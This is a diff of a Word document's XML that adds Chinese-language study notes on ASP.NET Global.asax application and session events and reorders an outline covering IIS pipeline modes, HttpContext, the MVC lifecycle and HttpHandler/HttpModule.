+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>包含的事件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>·Application_Init：在应用程序被实例化或第一次被调用时，该事件被触发。对于所有的HttpApplication 对象实例，它都会被调用。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_Disposed：在应用程序被销毁之前触发。这是清除以前所用资源的理想位置。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_Error：当应用程序中遇到一个未处理的异常时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_Start：在HttpApplication 类的第一个实例被创建时，该事件被触发。它允许你创建可以由所有HttpApplication 实例访问的对象。 这是在应用程序中给应用程序级的变量赋值或指定对所有用户必须保持的状态的理想位置。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">　　·Application_End：在HttpApplication 类的最后一个实例被销毁时，该事件被触发。在一个应用程序的生命周期内它只被触发一次。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_BeginRequest：在接收到一个应用程序请求时触发。对于一个请求来说，它是第一个被触发的事件，请求一般是用户输入的一个页面请求（URL）。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_EndRequest：针对应用程序请求的最后一个事件。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_PreRequestHandlerExecute：在 ASP.NET 页面框架开始执行诸如页面或 Web 服务之类的事件处理程序之前，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_PostRequestHandlerExecute：在 ASP.NET 页面框架结束执行一个事件处理程序时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Applcation_PreSendRequestHeaders：在 ASP.NET 页面框架发送 HTTP 头给请求客户（浏览器）时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_PreSendContent：在 ASP.NET 页面框架发送内容给请求客户（浏览器）时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_AcquireRequestState：在 ASP.NET 页面框架得到与当前请求相关的当前状态（Session 状态）时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_ReleaseRequestState：在 ASP.NET 页面框架执行完所有的事件处理程序时，该事件被触发。这将导致所有的状态模块保存它们当前的状态数据。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_ResolveRequestCache：在 ASP.NET 页面框架完成一个授权请求时，该事件被触发。它允许缓存模块从缓存中为请求提供服务，从而绕过事件处理程序的执行。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_UpdateRequestCache：在 ASP.NET 页面框架完成事件处理程序的执行时，该事件被触发，从而使缓存模块存储响应数据，以供响应后续的请求时使用。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_AuthenticateRequest：在安全模块建立起当前用户的有效的身份时，该事件被触发。在这个时候，用户的凭据将会被验证。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Application_AuthorizeRequest：当安全模块确认一个用户可以访问资源之后，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Session_Start：在一个新用户访问应用程序 Web 站点时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
+          <w:color w:val="4F4F4F"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">　　·Session_End：在 InProc 模式下运行时，当一个用户的会话超时、结束或他们离开应用程序 Web 站点时，该事件被触发。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25342,17 +26773,17 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>经典模式</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>IIS5/IIS6</w:t>
+        <w:t>集成模式</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>IIS7</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25370,7 +26801,7 @@
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="5"/>
-          <w:numId w:val="66"/>
+          <w:numId w:val="67"/>
         </w:numPr>
         <w:ind w:left="2702"/>
       </w:pPr>
@@ -25382,17 +26813,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>IIS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>管道模型</w:t>
+        <w:t>HttpContext</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25400,37 +26821,7 @@
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="5"/>
-          <w:numId w:val="66"/>
-        </w:numPr>
-        <w:ind w:left="2702"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ASP.NET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>管道模型</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="5"/>
-          <w:numId w:val="66"/>
+          <w:numId w:val="67"/>
         </w:numPr>
         <w:ind w:left="2702"/>
       </w:pPr>
@@ -25462,27 +26853,18 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>集成模式</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>IIS7</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>：</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>IIs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的常用功能及使用及配置：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25490,7 +26872,7 @@
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="5"/>
-          <w:numId w:val="67"/>
+          <w:numId w:val="68"/>
         </w:numPr>
         <w:ind w:left="2702"/>
       </w:pPr>
@@ -25502,27 +26884,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>HttpContext</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="5"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:ind w:left="2702"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
+        <w:t>请求筛选、失败请求跟踪等</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25542,37 +26904,17 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>IIs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>的常用功能及使用及配置：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="5"/>
-          <w:numId w:val="68"/>
-        </w:numPr>
-        <w:ind w:left="2702"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>请求筛选、失败请求跟踪等</w:t>
+        <w:t>.Net MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>生命周期</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25583,27 +26925,317 @@
           <w:numId w:val="66"/>
         </w:numPr>
         <w:ind w:left="2250"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.Net MVC</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>生命周期</w:t>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Httphandler</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Globar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的编写及应用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="3600"/>
+        </w:tabs>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
